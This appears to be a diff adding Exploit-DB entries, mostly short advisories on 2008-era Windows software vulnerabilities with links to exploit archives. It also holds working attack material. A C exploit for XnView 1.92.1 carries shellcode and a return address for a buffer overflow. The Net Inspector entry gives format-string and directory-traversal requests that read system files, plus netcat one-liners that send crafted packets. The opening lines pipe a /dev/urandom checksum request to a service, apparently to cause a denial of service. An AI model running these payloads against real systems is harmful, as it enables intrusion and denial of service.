+echo "vfs.file.cksum[/dev/urandom]" | nc localhost
+echo "vfs.file.cksum[/dev/urandom]" | nc localhost 

platforms/windows/dos/31300.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27990/info
+
+SurgeMail and WebMail are prone to a remote format-string vulnerability because the applications fail to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function.
+
+A remote attacker may execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial of service.
+
+This issue affects the following:
+
+SurgeMail 38k4, beta 39a and earlier
+Netwin WebMail 3.1s and earlier 
+
+http://www.exploit-db.com/sploits/31300.zip

platforms/windows/dos/31301.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27992/info
+
+SurgeMail is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts likely result in denial-of-service conditions.
+
+SurgeMail 38k4 and prior versions are vulnerable. 
+
+http://www.exploit-db.com/sploits/31301.zip

platforms/windows/dos/31310.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/28020/info
+
+Trend Micro OfficeScan Corporate Edition is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
+
+Successful exploits may allow an attacker to execute arbitrary code with privileges of the user running the application. This may facilitate a complete compromise of vulnerable computers. Failed exploit attempts will likely result in denial-of-service conditions.
+
+These issues affect the following:
+
+OfficeScan Corporate Edition 8.0 Patch 2 Build 1189 and earlier
+OfficeScan Corporate Edition 7.0 Patch 3 Build 1314 and earlier
+
+Other Trend Micro products may also be affected. 
+
+http://www.exploit-db.com/sploits/31310.zip

platforms/windows/dos/31330.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28084/info
+
+Borland VisiBroker Smart Agent is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and a denial-of-service issue.
+
+A successful exploit will allow remote attackers to execute arbitrary code in the context of the affected software or to crash the affected application, denying service to legitimate users.
+
+These issues affect Borland VisiBroker Smart Agent 08.00.00.C1.03; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/31330.zip

platforms/windows/dos/31338.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28108/info
+
+Perforce Server is prone to multiple remote denial-of-service vulnerabilities.
+
+An attacker can exploit these issues to crash the affected application or cause excessive memory to be consumed, denying service to legitimate users.
+
+These issues affect Perforce Server 2007.3; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/31338.zip

platforms/windows/dos/31360.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/28145/info
+
+MailEnable is prone to multiple remote vulnerabilities in the IMAP service, including:
+
+- Multiple buffer-overflow vulnerabilities.
+- Multiple denial-of-service vulnerabilities due to a NULL-pointer exception.
+
+An attacker may leverage these issues to execute arbitrary code in the context of the running application or to crash the application, causing a denial of service.
+
+These issues affect MailEnable 3.13; other versions may also be vulnerable. 
+
+http://www.exploit-db.com/sploits/31360_1.zip
+http://www.exploit-db.com/sploits/31360_2.pl

platforms/windows/dos/31361.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28146/info
+
+Microsoft Office is prone to a remote memory-corruption vulnerability.
+
+An attacker could exploit this issue by enticing a victim to open a malicious Office file.
+
+Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user. 
+
+http://www.exploit-db.com/sploits/31361.tgz

platforms/windows/dos/31363.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28150/info
+
+Panda Internet Security/Antivirus+Firewall 2008 is prone to a vulnerability that allows local attackers to corrupt kernel memory. This vulnerability occurs because the application fails to sufficiently validate IOCTL requests.
+
+Local users may exploit this vulnerability to cause a denial of service or to execute arbitrary code in the context of the kernel. 
+
+http://www.exploit-db.com/sploits/31363.rar

platforms/windows/dos/31381.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28186/info
+
+Motorola Timbuktu Pro is prone to multiple denial-of-service vulnerabilities.
+
+Exploiting these issues will allow attackers to crash the affected application, denying further service to legitimate users.
+
+http://www.exploit-db.com/sploits/31381.zip

platforms/windows/dos/31399.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28228/info
+
+McAfee Framework is prone to a remote format-string vulnerability.
+
+Exploiting this issue will allow attackers to execute arbitrary code with the permissions of the framework or of an application that uses the framework. Failed attacks will likely cause denial-of-service conditions.
+McAfee Common Managemetn Agent 3.6.0.574 (Patch3) or earlier, McAfee Agent (MA) 4.0, Framework 2.6.0.569 and ePolicy Orchestrator 4.0 are vulnerable to this issue; other versions may also be affected.
+
+NOTE: This issue occurs only when the default debug level (7) is raised to 8. 
+
+http://www.exploit-db.com/sploits/31399.zip

platforms/windows/remote/31405.c

@@ -0,0 +1,50 @@
+source: http://www.securityfocus.com/bid/28259/info
+
+XnView is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+Attackers may exploit this issue only if XnView is configured as a handler for other applications, so that it can be passed malicious filenames as command-line data.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial of service.
+
+This issue affects XnView 1.92.1; other versions may also be vulnerable.
+
+#include <unistd.h>  
+
+/*
+Shellcode
+Size=164 octets
+Action: open calc.exe
+*/
+unsigned char shellcode[] =
+"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16"
+"\x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1"
+"\x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd"
+"\x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99"
+"\x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2"
+"\x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0"
+"\x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f"
+"\x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc"
+"\x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90"
+"\x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec"
+"\x73\x77\x0b\x94";
+
+/*
+user32.dll ret adress ==> jmp ebp
+under Win XP pro SP2
+*/
+unsigned char ret[] ="\x34\x59\x40\x7e";
+
+
+int main(int argc,char *argv[]){
+char *bufExe[3];
+char buf[511];
+bufExe[0] = "xnview.exe";
+bufExe[2] = NULL;
+memset(buf,0x90,511);
+memcpy(&buf[260],ret,4);   
+memcpy(&buf[330],shellcode,sizeof(shellcode));   
+bufExe[1] = buf;
+
+execve(bufExe[0],bufExe,NULL);
+return 0x0;
+}

platforms/windows/remote/31407.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/28266/info
+
+Net Inspector is prone to multiple remote vulnerabilities, including:
+
+- A format-string vulnerability
+- A directory-traversal vulnerability
+- Multiple denial-of-service vulnerabilities
+
+An attacker can exploit these issues to execute arbitrary code within the context of the affected application, obtain sensitive information, or crash the affected application.
+
+These issues affect Net Inspector 6.5.0.828; other versions may also be affected. 
+
+GET /%n%n%s%s%n%n%n%s HTTP/1.0
+
+GET ../../../../boot.ini HTTP/1.0
+
+GET \../..\../..\windows/win.ini HTTP/1.0
+
+cho|nc SERVER PORT -v -v -u
+
+echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1
+

platforms/windows/remote/31409.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28270/info
+
+BootManage TFTP Server is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before storing it in a finite-sized buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+BootManage TFTP Server 1.99 is vulnerable; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/31409.zip